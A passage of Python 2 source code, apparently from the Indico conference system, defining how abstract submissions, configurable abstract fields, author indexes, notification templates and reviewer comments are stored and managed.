class Submitter(AbstractParticipation):
def __init__(self, abstract, av):
if av is None:
raise MaKaCError(_("abstract submitter cannot be None"))
AbstractParticipation.__init__(self, abstract)
self._user = None
self._setUser(av)
self.setFromAvatar(av)
def _setUser(self, av):
if self.getUser() == av:
return
#if currently there's an association with a registered user, we notify
# the unidexation of the participation
if self.getUser():
self.getAbstract().getOwner().unregisterParticipation(self)
self._user = av
#if the participation is associated to any avatar, we make the
# association and index it
if self.getUser():
self.getAbstract().getOwner().registerParticipation(self)
def clone(self, abstract):
sub = Submitter(abstract, self.getAvatar())
sub.setData(self.getData())
return sub
def getUser(self):
return self._user
def getAvatar(self):
return self._user
def representsUser(self, av):
return self.getUser() == av
class _AuthIdx(Persistent):
def __init__(self, mgr):
self._mgr = mgr
self._idx = OOBTree()
def _getKey(self, auth):
return "%s %s" % (auth.getSurName().lower(), auth.getFirstName().lower())
def index(self, auth):
if auth.getAbstract() is None:
raise MaKaCError(_("cannot index an author of an abstract which is not included in a conference"))
if auth.getAbstract().getOwner() != self._mgr:
raise MaKaCError(_("cannot index an author of an abstract which does not belong to this conference"))
key = self._getKey(auth)
abstractId = str(auth.getAbstract().getId())
if not self._idx.has_key(key):
self._idx[key] = OIBTree.OIBTree()
if not self._idx[key].has_key(abstractId):
self._idx[key][abstractId] = 0
self._idx[key][abstractId] += 1
def unindex(self, auth):
if auth.getAbstract() is None:
raise MaKaCError(_("cannot unindex an author of an abstract which is not included in a conference"))
if auth.getAbstract().getOwner() != self._mgr:
raise MaKaCError(_("cannot unindex an author of an abstract which does not belong to this conference"))
key = self._getKey(auth)
if not self._idx.has_key(key):
return
abstractId = str(auth.getAbstract().getId())
if abstractId not in self._idx[key]:
return
self._idx[key][abstractId] -= 1
if self._idx[key][abstractId] <= 0:
del self._idx[key][abstractId]
if len(self._idx[key]) <= 0:
del self._idx[key]
def match(self, query):
query = query.lower().strip()
res = OIBTree.OISet()
for k in self._idx.keys():
if k.find(query) != -1:
res = OIBTree.union(res, self._idx[k])
return res
class _PrimAuthIdx(_AuthIdx):
def __init__(self, mgr):
_AuthIdx.__init__(self, mgr)
for abs in self._mgr.getAbstractList():
for auth in abs.getPrimaryAuthorList():
self.index(auth)
class _AuthEmailIdx(_AuthIdx):
def __init__(self, mgr):
_AuthIdx.__init__(self, mgr)
for abs in self._mgr.getAbstractList():
for auth in abs.getPrimaryAuthorList():
self.index(auth)
for auth in abs.getCoAuthorList():
self.index(auth)
def _getKey(self, auth):
return auth.getEmail().lower()
class AbstractField(Persistent, Fossilizable):
fossilizes(IAbstractFieldFossil)
fieldtypes = ["textarea", "input", "selection"]
@classmethod
def makefield(cls, params):
fieldType = params["type"]
if fieldType not in cls.fieldtypes:
return AbstractTextAreaField(params)
elif fieldType == "textarea":
return AbstractTextAreaField(params)
elif fieldType == "input":
return AbstractInputField(params)
elif fieldType == "selection":
return AbstractSelectionField(params)
def __init__(self, params):
self._id = params["id"]
self._caption = params.get("caption") if params.get("caption") else self._id
self._isMandatory = params.get("isMandatory") if params.get("isMandatory") else False
self._active = True
def clone(self):
""" To be implemented by subclasses """
pass
def _notifyModification(self):
self._p_changed = 1
def check(self, content):
errors = []
if self._active and self._isMandatory and content == "":
errors.append(_("The field '%s' is mandatory") % self._caption)
return errors
def getType(self):
return self._type
def isMandatory(self):
return self._isMandatory
def setMandatory(self, isMandatory=False):
self._isMandatory = isMandatory
self._notifyModification()
def getId(self):
return self._id
def setId(self, id):
self._id = id
self._notifyModification()
def getCaption(self):
return self._caption
def setCaption(self, caption):
self._caption = caption
self._notifyModification()
def isActive(self):
return self._active
def setActive(self, active):
self._active = active
self._notifyModification()
def getValues(self):
values = []
values["id"] = self.getId()
values["caption"] = self.getCaption()
values["isMandatory"] = self.isMandatory()
return values
def setValues(self, params):
self.setCaption(params.get("caption") if params.get("caption") else self._id)
self.setMandatory(params.get("isMandatory") if params.get("isMandatory") else False)
self._notifyModification()
class AbstractTextField(AbstractField):
fossilizes(IAbstractTextFieldFossil)
limitationtypes = ["chars", "words"]
def __init__(self, params):
AbstractField.__init__(self, params)
self._maxLength = params.get("maxLength") if params.get("maxLength") else 0
self._limitation = params.get("limitation") if params.get("limitation") in self.limitationtypes else "chars"
def clone(self):
return AbstractTextField(self.getValues())
def check(self, content):
errors = AbstractField.check(self, content)
if self._maxLength != 0:
if self._limitation == "words" and wordsCounter(str(content)) > self._maxLength:
errors.append(_("The field '%s' cannot be more than %s words") % (self._caption, self._maxLength))
elif self._limitation == "chars" and len(content) > self._maxLength:
errors.append(_("The field '%s' cannot be more than %s characters") % (self._caption, self._maxLength))
return errors
def getLimitation(self):
return self._limitation
def getMaxLength(self):
return self._maxLength
def setLimitation(self, limitation="chars"):
self._limitation = limitation if limitation in self.limitationtypes else "chars"
self._notifyModification()
def setMaxLength(self, maxLength=0):
self._maxLength = maxLength
self._notifyModification()
def getValues(self):
values = AbstractField.getValues(self)
values["maxLength"] = self.getMaxLength()
values["limitation"] = self.getLimitation()
return values
def setValues(self, params):
AbstractField.setValues(self, params)
self.setMaxLength(params.get("maxLength") if params.get("maxLength") else 0)
self.setLimitation(params.get("limitation") if params.get("limitation") in self.limitationtypes else "chars")
self._notifyModification()
class AbstractTextAreaField(AbstractTextField):
_type = "textarea"
pass
class AbstractInputField(AbstractTextField):
_type = "input"
pass
class AbstractSelectionField(AbstractField):
fossilizes(IAbstractSelectionFieldFossil)
_type = "selection"
def __init__(self, params):
AbstractField.__init__(self, params)
self.__id_generator = Counter()
self._options = []
self._deleted_options = []
for o in params.get("options") if params.get("options") else []:
self._setOption(o)
def _deleteOption(self, option):
self._options.remove(option)
self._deleted_options.append(option)
def _updateDeletedOptions(self, options=[]):
stored_options = set(self._options)
updated_options = set(self.getOption(o["id"]) for o in options)
for deleted_option in stored_options - updated_options:
self._deleteOption(deleted_option)
def _setOption(self, option, index=None):
stored = self.getOption(option["id"])
if stored:
stored.value = option["value"]
oldindex = self._options.index(stored)
self._options.insert(index, self._options.pop(oldindex))
elif option["value"] is not "":
option["id"] = self.__id_generator.newCount()
self._options.append(SelectionFieldOption(option["id"], option["value"]))
def clone(self):
return AbstractSelectionField(self.getValues())
def check(self, content):
errors = AbstractField.check(self, content)
if self._active and self._isMandatory and content == "":
errors.append(_("The field '%s' is mandatory") % self._caption)
elif content != "":
if next((op for op in self._options if op.id == content), None) is None:
errors.append(_("The option with ID '%s' in the field %s") % (content, self._caption))
return errors
def getDeletedOption(self, id):
return next((o for o in self._deleted_options if o.getId() == id), None)
def getDeletedOptions(self, id):
return self._deleted_options
def getOption(self, id):
return next((o for o in self._options if o.getId() == id), None)
def getOptions(self):
return self._options
def setOptions(self, options=[]):
self._updateDeletedOptions(options)
for i, o in enumerate(options):
self._setOption(o, i)
self._notifyModification()
def getValues(self):
values = AbstractField.getValues(self)
options = []
for o in self._options:
options.append(o.__dict__)
values["options"] = options
return values
def setValues(self, params):
AbstractField.setValues(self, params)
self.setOptions(params.get("options"))
self._notifyModification()
class SelectionFieldOption(Fossilizable):
fossilizes(ISelectionFieldOptionFossil)
def __init__(self, id, value):
self.id = id
self.value = value
self.deleted = False
def __eq__(self, other):
if isinstance(other, SelectionFieldOption):
return self.id == other.id
return False
def __hash__(self):
return hash(self.id)
def __repr__(self):
return self.id
def __str__(self):
return self.value
def getValue(self):
return self.value
def getId(self):
return self.id
def isDeleted(self):
return self.deleted
class AbstractFieldContent(Persistent):
def __init__(self, field, value):
self.field = field
self.value = value
def __eq__(self, other):
if isinstance(other, AbstractFieldContent) and self.field == other.field:
return self.value == other.value
elif not isinstance(other, AbstractFieldContent):
return self.value == other
return False
def __len__(self):
return len(self.value)
def __ne__(self, other):
if isinstance(other, AbstractFieldContent) and self.field == other.field:
return self.value != other.value
elif not isinstance(other, AbstractFieldContent):
return self.value != other
return True
def __str__(self):
if isinstance(self.field, AbstractSelectionField):
return str(self.field.getOption(self.value))
else:
return str(self.value)
class AbstractFieldsMgr(Persistent):
def __init__(self):
self._fields = self._initFields()
self.__fieldGenerator = Counter()
def clone(self):
afm = AbstractFieldsMgr()
for f in self.getFields():
afm._addField(f.clone())
return afm
def getFieldGenerator(self):
try:
if self.__fieldGenerator:
pass
except AttributeError, e:
self.__fieldGenerator = Counter()
return self.__fieldGenerator
def _notifyModification(self):
self._p_changed = 1
def _initFields(self):
d = []
params = {"type": "textarea", "id": "content", "caption": N_("Content"), "isMandatory": True}
d.append(AbstractField.makefield(params))
params = {"type": "textarea", "id": "summary", "caption": N_("Summary")}
d.append(AbstractField.makefield(params))
return d
def hasField(self, id):
for f in self._fields:
if f.getId() == id:
return True
return False
def getFields(self):
if not self.hasField("content"):
params = {"type": "textarea", "id": "content", "caption": _("Content"), "isMandatory": True}
ac = AbstractField.makefield(params)
self._fields.insert(0, ac)
return self._fields
def getActiveFields(self):
fl = []
for f in self.getFields():
if f.isActive():
fl.append(f)
return fl
def hasActiveField(self, id):
return self.hasField(id) and self.getFieldById(id).isActive()
def hasAnyActiveField(self):
for f in self._fields:
if f.isActive():
return True
return False
def enableField(self, id):
if self.hasField(id):
self.getFieldById(id).setActive(True)
self._notifyModification()
def disableField(self, id):
if self.hasField(id):
self.getFieldById(id).setActive(False)
self._notifyModification()
def getFieldKeys(self):
keys = []
for f in self._fields:
keys.append(f.getId())
return keys
def getFieldById(self, id):
for f in self._fields:
if f.getId() == id:
return f
return None
def _addField(self, field):
self._fields.append(field)
def setField(self, params):
if self.hasField(params["id"]):
self.getFieldById(params["id"]).setValues(params)
else:
params["id"] = str(self.getFieldGenerator().newCount())
absf = AbstractField.makefield(params)
self._fields.append(absf)
self._notifyModification()
return params["id"]
def removeField(self, id):
if self.hasField(id):
self._fields.remove(self.getFieldById(id))
self._notifyModification()
def moveAbsFieldUp(self, id):
if self.hasField(id):
f = self.getFieldById(id)
idx = self._fields.index(f)
self._fields.remove(f)
if idx == 0:
self._fields.append(f)
else:
self._fields.insert(idx-1, f)
self._notifyModification()
def moveAbsFieldDown(self, id):
if self.hasField(id):
f = self.getFieldById(id)
idx = self._fields.index(f)
self._fields.remove(f)
if idx == len(self._fields):
self._fields.insert(0, f)
else:
self._fields.insert(idx+1, f)
self._notifyModification()
class AbstractMgr(Persistent):
def __init__(self, owner):
self._owner = owner
self._abstracts = OOBTree()
self._participationIdx = _AbstractParticipationIndex()
self.__abstractGenerator = Counter()
self._activated = False
self.setStartSubmissionDate(datetime.now())
self.setEndSubmissionDate(datetime.now())
## self._contribTypes = PersistentList()
self.setAnnouncement("")
self._notifTpls = IOBTree()
self._notifTplsOrder = PersistentList()
self.__notifTplsCounter = Counter()
self._authorizedSubmitter = PersistentList()
self._primAuthIdx = _PrimAuthIdx(self)
self._authEmailIdx = _AuthEmailIdx(self)
self._abstractFieldsMgr = AbstractFieldsMgr()
self._submissionNotification = SubmissionNotification()
self._multipleTracks = True
self._tracksMandatory = False
self._attachFiles = False
self._showSelectAsSpeaker = True
self._selectSpeakerMandatory = True
self._showAttachedFilesContribList = False
def getMultipleTracks(self):
try:
return self._multipleTracks
except:
self.setMultipleTracks(True)
return self._multipleTracks
def setMultipleTracks(self, multipleTracks=True):
self._multipleTracks = multipleTracks
def areTracksMandatory(self):
try:
return self._tracksMandatory
except:
self.setTracksMandatory(False)
return self._tracksMandatory
def canAttachFiles(self):
try:
return self._attachFiles
except:
self.setAllowAttachFiles(False)
return self._attachFiles
def setAllowAttachFiles(self, attachedFiles):
self._attachFiles = attachedFiles
def setTracksMandatory(self, tracksMandatory=False):
self._tracksMandatory = tracksMandatory
def showSelectAsSpeaker(self):
try:
return self._showSelectAsSpeaker
except:
self._showSelectAsSpeaker = True
return self._showSelectAsSpeaker
def setShowSelectAsSpeaker(self, showSelectAsSpeaker):
self._showSelectAsSpeaker = showSelectAsSpeaker
def isSelectSpeakerMandatory(self):
try:
return self._selectSpeakerMandatory
except:
self._selectSpeakerMandatory = True
return self._selectSpeakerMandatory
def setSelectSpeakerMandatory(self, selectSpeakerMandatory):
self._selectSpeakerMandatory = selectSpeakerMandatory
def showAttachedFilesContribList(self):
try:
return self._showAttachedFilesContribList
except:
self._showAttachedFilesContribList = False
return self._showAttachedFilesContribList
def setSwitchShowAttachedFilesContribList(self, showshowAttachedFilesContribList):
self._showAttachedFilesContribList = showshowAttachedFilesContribList
def getAbstractFieldsMgr(self):
try:
return self._abstractFieldsMgr
except:
self._abstractFieldsMgr = AbstractFieldsMgr()
return self._abstractFieldsMgr
def clone(self, conference):
amgr = AbstractMgr(conference)
amgr._abstractFieldsMgr = self.getAbstractFieldsMgr().clone()
amgr.setAnnouncement(self.getAnnouncement())
timeDifference = conference.getStartDate() - self.getOwner().getStartDate()
amgr.setStartSubmissionDate(self.getStartSubmissionDate() + timeDifference)
amgr.setEndSubmissionDate(self.getEndSubmissionDate() + timeDifference)
modifDeadline = self.getModificationDeadline()
if modifDeadline is not None:
amgr.setModificationDeadline(self.getModificationDeadline() + timeDifference)
amgr.setActive(self.isActive())
if self.getCFAStatus():
amgr.activeCFA()
else:
amgr.desactiveCFA()
for a in self.getAbstractList():
amgr.addAbstract(a.clone(conference, amgr._generateNewAbstractId()))
for tpl in self.getNotificationTplList():
amgr.addNotificationTpl(tpl.clone())
# Cloning submission notification:
amgr.setSubmissionNotification(self.getSubmissionNotification().clone())
return amgr
def getOwner(self):
return self._owner
getConference = getOwner
def getTimezone(self):
return self.getConference().getTimezone()
def activeCFA(self):
self._activated = True
def desactiveCFA(self):
self._activated = False
def getAuthorizedSubmitterList(self):
try:
return self._authorizedSubmitter
except AttributeError:
self._authorizedSubmitter = PersistentList()
return self._authorizedSubmitter
def addAuthorizedSubmitter(self, av):
try:
if self._authorizedSubmitter:
pass
except AttributeError:
self._authorizedSubmitter = PersistentList()
if not av in self._authorizedSubmitter:
self._authorizedSubmitter.append(av)
def removeAuthorizedSubmitter(self, av):
try:
if self._authorizedSubmitter:
pass
except:
self._authorizedSubmitter = PersistentList()
if av in self._authorizedSubmitter:
self._authorizedSubmitter.remove(av)
def getCFAStatus(self):
return self._activated
def setActive(self, value):
if value:
self.activeCFA()
else:
self.desactiveCFA()
def isActive(self):
return self._activated
def setStartSubmissionDate(self, date):
self._submissionStartDate = datetime(date.year, date.month, date.day, 0, 0, 0)
def getStartSubmissionDate(self):
return timezone(self.getTimezone()).localize(self._submissionStartDate)
def setEndSubmissionDate(self, date):
self._submissionEndDate = datetime(date.year, date.month, date.day, 23, 59, 59)
def getEndSubmissionDate(self):
return timezone(self.getTimezone()).localize(self._submissionEndDate)
def inSubmissionPeriod(self, date=None):
if date is None:
date = nowutc()
sd = self.getStartSubmissionDate()
ed = self.getEndSubmissionDate()
return date <= ed and date >= sd
def getModificationDeadline(self):
"""Returns the deadline for modifications on the submitted abstracts.
"""
try:
if self._modifDeadline:
pass
except AttributeError, e:
self._modifDeadline = None
if self._modifDeadline is not None:
return timezone(self.getTimezone()).localize(self._modifDeadline)
else:
return None
def setModificationDeadline(self, newDL):
"""Sets a new deadline for modifications on the submitted abstracts.
"""
if newDL is not None:
self._modifDeadline = datetime(newDL.year, newDL.month, newDL.day, 23, 59, 59)
else:
self._modifDeadline = newDL
def inModificationPeriod(self, date=None):
"""Tells whether is possible to modify a submitted abstract in a
certain date.
"""
if date is None:
date = nowutc()
if not self.getModificationDeadline():
return True
return date <= self.getModificationDeadline()
def getAnnouncement(self):
#to be removed
try:
if self._announcement:
pass
except AttributeError, e:
self._announcement = ""
return self._announcement
def setAnnouncement(self, newAnnouncement):
self._announcement = newAnnouncement.strip()
## def addContribType(self, type):
## type = type.strip()
## if type == "":
## raise MaKaCError("Cannot add an empty contribution type")
## self._contribTypes.append(type)
##
## def removeContribType(self, type):
## if type in self._contribTypes:
## self._contribTypes.remove(type)
##
## def getContribTypeList(self):
## return self._contribTypes
def _generateNewAbstractId(self):
"""Returns a new unique identifier for the current conference
contributions
"""
#instead of having a own counter, the abstract manager will request
# abstract ids to the conference which will ensure a unique id
# which will persist afterwards when an abstract is accepted
return str(self.getConference().genNewAbstractId())
def _getOldAbstractCounter(self):
return self.__abstractGenerator._getCount()
def newAbstract(self, av, **data):
"""Creates a new abstract under this manager
"""
id = self._generateNewAbstractId()
a = Abstract(self, id, av, **data)
self._abstracts[id] = a
for auth in a.getPrimaryAuthorList():
self.indexAuthor(auth)
return a
def addAbstract(self, abstract):
if abstract in self.getAbstractList():
return
if isinstance(abstract.getCurrentStatus(), AbstractStatusWithdrawn):
raise MaKaCError(_("Cannot add an abstract which has been withdrawn"), ("Event"))
abstract._setOwner(self)
self._abstracts[abstract.getId()] = abstract
for auth in abstract.getPrimaryAuthorList():
self.indexAuthor(auth)
def removeAbstract(self, abstract):
if self._abstracts.has_key(abstract.getId()):
#for auth in abstract.getPrimaryAuthorList():
# self.unindexAuthor(auth)
# * Remove dependencies with another abstracts:
# - If it's an accepted abstract-->remove abstract from contribution
if isinstance(abstract.getCurrentStatus(), AbstractStatusAccepted):
raise NoReportError(_("Cannot remove an accepted abstract before removing the contribution linked to it"))
# If it's a withdrawn abstract-->remove abstract from contribution
if isinstance(abstract.getCurrentStatus(), AbstractStatusWithdrawn) and abstract.getContribution():
raise NoReportError(_("Cannot remove the abstract before removing the contribution linked to it"))
for abs in self._abstracts.values():
if abs != abstract:
st = abs.getCurrentStatus()
if isinstance(st, AbstractStatusDuplicated):
#if the abstract to delete is the orginal in another "duplicated", change status to submitted
if st.getOriginal() == abstract:
abs.setCurrentStatus(AbstractStatusSubmitted(abs))
elif isinstance(st, AbstractStatusMerged):
#if the abstract to delete is the target one in another "merged", change status to submitted
if st.getTargetAbstract() == abstract:
abs.setCurrentStatus(AbstractStatusSubmitted(abs))
#unindex participations!!!
self.unregisterParticipation(abstract.getSubmitter())
del self._abstracts[abstract.getId()]
abstract.delete()
def recoverAbstract(self, abstract):
self.addAbstract(abstract)
abstract.recoverFromTrashCan()
def getAbstractList(self):
return self._abstracts.values()
def getAbstractById(self, id):
return self._abstracts.get(str(id), None)
def registerParticipation(self, p):
self._participationIdx.index(p)
def unregisterParticipation(self, p):
self._participationIdx.unindex(p)
def getAbstractListForAvatar(self, av):
try:
if self._participationIdx:
pass
except AttributeError, e:
self._participationIdx = self._partipationIdx
self._partipationIdx = None
res = []
for participation in self._participationIdx.getParticipationList(av):
abstract = participation.getAbstract()
if abstract is not None and abstract.isSubmitter(av):
if abstract not in res:
res.append(abstract)
return res
def getAbstractListForAuthorEmail(self, email):
""" Get list of abstracts where the email belongs to an author"""
return [self.getAbstractById(i) for i in self._getAuthEmailIndex().match(email)]
def getNotificationTplList(self):
try:
if self._notifTpls:
pass
except AttributeError:
self._notifTpls = IOBTree()
try:
if self._notifTplsOrder:
pass
except AttributeError:
self._notifTplsOrder = PersistentList()
for tpl in self._notifTpls.values():
self._notifTplsOrder.append(tpl)
return self._notifTplsOrder
def addNotificationTpl(self, tpl):
try:
if self._notifTpls:
pass
except AttributeError:
self._notifTpls = IOBTree()
try:
if self._notifTplsOrder:
pass
except AttributeError:
self._notifTplsOrder = PersistentList()
for tpl in self._notifTpls.values():
self._notifTplsOrder.append(tpl)
try:
if self._notifTplsCounter:
pass
except AttributeError:
self._notifTplsCounter = Counter()
if tpl.getOwner() == self and self._notifTpls.has_key(tpl.getId()):
return
id = tpl.getId()
if id == "":
id = self._notifTplsCounter.newCount()
tpl.includeInOwner(self, id)
self._notifTpls[int(id)] = tpl
self._notifTplsOrder.append(tpl)
def removeNotificationTpl(self, tpl):
try:
if self._notifTpls:
pass
except AttributeError:
self._notifTpls = IOBTree()
try:
if self._notifTplsOrder:
pass
except AttributeError:
self._notifTplsOrder = PersistentList()
for tpl in self._notifTpls.values():
self._notifTplsOrder.append(tpl)
if tpl.getOwner() != self or not self._notifTpls.has_key(int(tpl.getId())):
return
del self._notifTpls[int(tpl.getId())]
self._notifTplsOrder.remove(tpl)
tpl.includeInOwner(None, tpl.getId()) # We don't change the id for
# recovery purposes.
tpl.delete()
def recoverNotificationTpl(self, tpl):
self.addNotificationTpl(tpl)
tpl.recover()
def getNotificationTplById(self, id):
try:
if self._notifTpls:
pass
except AttributeError:
self._notifTpls = IOBTree()
return self._notifTpls.get(int(id), None)
def getNotifTplForAbstract(self, abs):
"""
"""
for tpl in self.getNotificationTplList():
if tpl.satisfies(abs):
return tpl
return None
def moveUpNotifTpl(self, tpl):
"""
"""
try:
if self._notifTplsOrder:
pass
except AttributeError:
self._notifTplsOrder = PersistentList()
for tpl in self._notifTpls.values():
self._notifTplsOrder.append(tpl)
if tpl not in self._notifTplsOrder:
return
idx = self._notifTplsOrder.index(tpl)
if idx == 0:
return
self._notifTplsOrder.remove(tpl)
self._notifTplsOrder.insert(idx-1, tpl)
def moveDownNotifTpl(self, tpl):
"""
"""
try:
if self._notifTplsOrder:
pass
except AttributeError:
self._notifTplsOrder = PersistentList()
for tpl in self._notifTpls.values():
self._notifTplsOrder.append(tpl)
idx = self._notifTplsOrder.index(tpl)
if idx == len(self._notifTplsOrder):
return
self._notifTplsOrder.remove(tpl)
self._notifTplsOrder.insert(idx+1, tpl)
def indexAuthor(self, auth):
a = auth.getAbstract()
if a.isPrimaryAuthor(auth):
self._getPrimAuthIndex().index(auth)
self._getAuthEmailIndex().index(auth)
def unindexAuthor(self, auth):
a = auth.getAbstract()
if a.isPrimaryAuthor(auth):
self._getPrimAuthIndex().unindex(auth)
self._getAuthEmailIndex().unindex(auth)
def _getPrimAuthIndex(self):
try:
if self._primAuthIdx:
pass
except AttributeError:
self._primAuthIdx = _PrimAuthIdx(self)
return self._primAuthIdx
def _getAuthEmailIndex(self):
if not hasattr(self, '_authEmailIdx'):
self._authEmailIdx = _AuthEmailIdx(self)
return self._authEmailIdx
def getAbstractsMatchingAuth(self, query, onlyPrimary=True):
if str(query).strip() == "":
return self.getAbstractList()
res = self._getPrimAuthIndex().match(query)
return [self.getAbstractById(id) for id in res]
def setAbstractField(self, params):
return self.getAbstractFieldsMgr().setField(params)
def removeAbstractField(self, id):
self.getAbstractFieldsMgr().removeField(id)
def hasAnyEnabledAbstractField(self):
return self.getAbstractFieldsMgr().hasAnyActiveField()
def hasEnabledAbstractField(self, key):
return self.getAbstractFieldsMgr().hasActiveField(key)
def enableAbstractField(self, abstractField):
self.getAbstractFieldsMgr().enableField(abstractField)
self.notifyModification()
def disableAbstractField(self, abstractField):
self.getAbstractFieldsMgr().disableField(abstractField)
self.notifyModification()
def moveAbsFieldUp(self, id):
self.getAbstractFieldsMgr().moveAbsFieldUp(id)
self.notifyModification()
def moveAbsFieldDown(self, id):
self.getAbstractFieldsMgr().moveAbsFieldDown(id)
self.notifyModification()
def getSubmissionNotification(self):
try:
if self._submissionNotification:
pass
except AttributeError, e:
self._submissionNotification = SubmissionNotification()
return self._submissionNotification
def setSubmissionNotification(self, sn):
self._submissionNotification = sn
def recalculateAbstractsRating(self, scaleLower, scaleHigher):
''' recalculate the values of the rating for all the abstracts in the conference '''
for abs in self.getAbstractList():
abs.updateRating((scaleLower, scaleHigher))
def removeAnswersOfQuestion(self, questionId):
''' Remove a question results for each abstract '''
for abs in self.getAbstractList():
abs.removeAnswersOfQuestion(questionId)
def notifyModification(self):
self._p_changed = 1
class SubmissionNotification(Persistent):
def __init__(self):
self._toList = PersistentList()
self._ccList = PersistentList()
def hasDestination(self):
return self._toList != [] or self._toList != []
def getToList(self):
return self._toList
def setToList(self, tl):
self._toList = tl
def addToList(self, to):
self._toList.append(to)
def clearToList(self):
self._toList = PersistentList()
def getCCList(self):
return self._ccList
def setCCList(self, cl):
self._ccList = cl
def addCCList(self, cc):
self._ccList.append(cc)
def clearCCList(self):
self._ccList = PersistentList()
def clone(self):
nsn = SubmissionNotification()
for i in self.getToList():
nsn.addToList(i)
for i in self.getCCList():
nsn.addCCList(i)
return nsn
class Comment(Persistent):
def __init__(self, res, content=""):
self._abstract = None
self._id = ""
self._responsible = res
self._content = ""
self._creationDate = nowutc()
self._modificationDate = nowutc()
def getLocator(self):
loc = self._abstract.getLocator()
loc["intCommentId"] = self._id
return loc
def includeInAbstract(self, abstract, id):
self._abstract = abstract
self._id = id
def delete(self):
self._abstract = None
TrashCanManager().add(self)
def recover(self):
TrashCanManager().remove(self)
def _notifyModification(self, dt=None):
if dt:
self._modificationDate = dt
else:
self._modificationDate = nowutc()
def getResponsible(self):
return self._responsible
def getAbstract(self):
return self._abstract
def getId(self):
return self._id
def getContent(self):
return self._content
def setContent(self, newContent):
self._content = newContent
self._notifyModification()
def getCreationDate(self):
return self._creationDate
def getModificationDate(self):
return self._modificationDate
def canModify(self, aw_or_user):
if hasattr(aw_or_user, 'getUser'):
aw_or_user = aw_or_user.getUser()
return self.canUserModify(aw_or_user)
def canUserModify(self, user):
abstract = self.getAbstract()
conf = abstract.getConference()
return self.getResponsible() == user and \
(abstract.canUserModify(user) or \
len(conf.getConference().getCoordinatedTracks(user)) > 0)
class Abstract(Persistent):
def __init__(self, owner, id, submitter, **abstractData):
self._setOwner( owner )
self._setId( id )
self._title = ""
self._fields = {}
self._authorGen = Counter()
self._authors = OOBTree()
self._primaryAuthors = PersistentList()
self._coAuthors = PersistentList()
self._speakers = PersistentList()
self._tracks = OOBTree()
self._contribTypes = PersistentList( [""] )
self._setSubmissionDate( nowutc() )
self._modificationDate = nowutc()
self._currentStatus = AbstractStatusSubmitted( self )
self._trackAcceptances = OOBTree()
self._trackRejections = OOBTree()
self._trackReallocations = OOBTree()
self._trackJudgementsHistorical={}
self._comments = ""
self._contribution = None
self._intCommentGen=Counter()
self._intComments=PersistentList()
self._mergeFromList = PersistentList()
self._notifLog=NotificationLog(self)
self._submitter=None
self._setSubmitter( submitter )
self._rating = None # It needs to be none to avoid the case of having the same value as the lowest value in the judgement
self._attachments = {}
self._attachmentsCounter = Counter()
def __cmp__(self, other):
if type(self) is not type(other):
# This is actually dangerous and the ZODB manual says not to do this
# because it relies on memory order. However, this branch should never
# be taken anyway since we do not store different types in the same set
# or use them as keys.
return cmp(hash(self), hash(other))
if self.getConference() == other.getConference():
return cmp(self.getId(), other.getId())
return cmp(self.getConference(), other.getConference())
def clone(self, conference, abstractId):
# abstractId - internal in abstract manager of the conference
abs = Abstract(conference.getAbstractMgr(), abstractId, self.getSubmitter().getAvatar())
abs.setTitle(self.getTitle())
for key in self.getFields().keys():
abs.setField(key,self.getField(key))
abs.setComments(self.getComments())
abs._setSubmissionDate(self.getSubmissionDate())
abs._modificationDate = self.getModificationDate()
# Cloning of primary- and coauthors
# if an author is also a speaker, an appropriate object will be
# appended also to the speaker list
for pa in self.getPrimaryAuthorList() :
npa = abs.newPrimaryAuthor(**(pa.getData()))
if self.isSpeaker(pa) :
abs.addSpeaker(npa)
for ca in self.getCoAuthorList() :
nca = abs.newCoAuthor(**(ca.getData()))
if self.isSpeaker(ca) :
abs.addSpeaker(nca)
# Cloning of speakers
# only those, who are not authors :
for sp in self.getSpeakerList() :
if not self.isAuthor(sp) :
abs.addSpeaker(sp.clone())
abs.setSubmitter(self.getSubmitter().getAvatar())
if self.getContribType() is not None :
for ct in conference.getContribTypeList() :
if self.getContribType().getName() == ct.getName() :
abs.setContribType(ct)
break
else :
abs.setContribType(None)
# the track, to which the abstract belongs to
# legacy list implementation
for tr in self.getTrackList() :
for newtrack in conference.getTrackList():
if newtrack.getTitle() == tr.getTitle() :
abs.addTrack(newtrack)
# overall abstract status (accepted / rejected)
abs._currentStatus = self._currentStatus.clone(abs)
for ta in self.getTrackAcceptanceList() :
for newtrack in conference.getTrackList():
if newtrack.getTitle() == ta.getTrack().getTitle() :
newta = ta.clone(newtrack)
abs._addTrackAcceptance(newta)
abs._addTrackJudgementToHistorical(newta)
for trj in self.getTrackRejections().values() :
for newtrack in conference.getTrackList():
if newtrack.getTitle() == trj.getTrack().getTitle() :
newtrj = trj.clone(newtrack)
abs._addTrackRejection(newtrj)
abs._addTrackJudgementToHistorical(newtrj)
for trl in self.getTrackReallocations().values() :
for newtrack in conference.getTrackList():
if newtrack.getTitle() == trl.getTrack().getTitle() :
newtrl = trl.clone(newtrack)
abs._addTrackReallocation(newtrl)
abs._addTrackJudgementToHistorical(newtrl)
# Cloning materials
for f in self.getAttachments().values():
newFile = f.clone(abs, protection=False)
abs.__addFile(newFile)
return abs
def getUniqueId( self ):
"""returns (string) the unique identifier of the item"""
"""used only in the web session access key table"""
"""it is the same as the conference since only the conf can"""
"""be protected with an access key"""
return self.getConference().getUniqueId()
def getMergeFromList(self):
try:
return self._mergeFromList
except AttributeError:
self._mergeFromList = PersistentList()
return self._mergeFromList
def addMergeFromAbstract(self, abstract):
try:
if self._mergeFromList:
pass
except AttributeError:
self._mergeFromList = PersistentList()
self._mergeFromList.append(abstract)
def removeMergeFromAbstract(self, abstract):
try:
if self._mergeFromList:
pass
except AttributeError:
self._mergeFromList = PersistentList()
if abstract in self._mergeFromList:
self._mergeFromList.remove(abstract)
def getComments(self):
try:
return self._comments
except AttributeError:
self._comments = ""
return self._comments
def setComments(self, comments):
self._comments = comments
def __addFile(self, file):
file.archive(self.getConference()._getRepository())
self.getAttachments()[file.getId()] = file
self._notifyModification()
def saveFiles(self, files):
cfg = Config.getInstance()
from MaKaC.conference import LocalFile
for fileUploaded in files:
if fileUploaded.filename:
# create a temp file
tempPath = cfg.getUploadedFilesTempDir()
tempFileName = tempfile.mkstemp(suffix="IndicoAbstract.tmp", dir=tempPath)[1]
f = open(tempFileName, "wb")
f.write(fileUploaded.file.read() )
f.close()
file = LocalFile()
file.setFileName(fileUploaded.filename)
file.setFilePath(tempFileName)
file.setOwner(self)
file.setId(self._getAttachmentsCounter())
self.__addFile(file)
def deleteFilesNotInList(self, keys):
"""This method is used in order to delete all the files that are not present (by id) in the
parameter "keys".
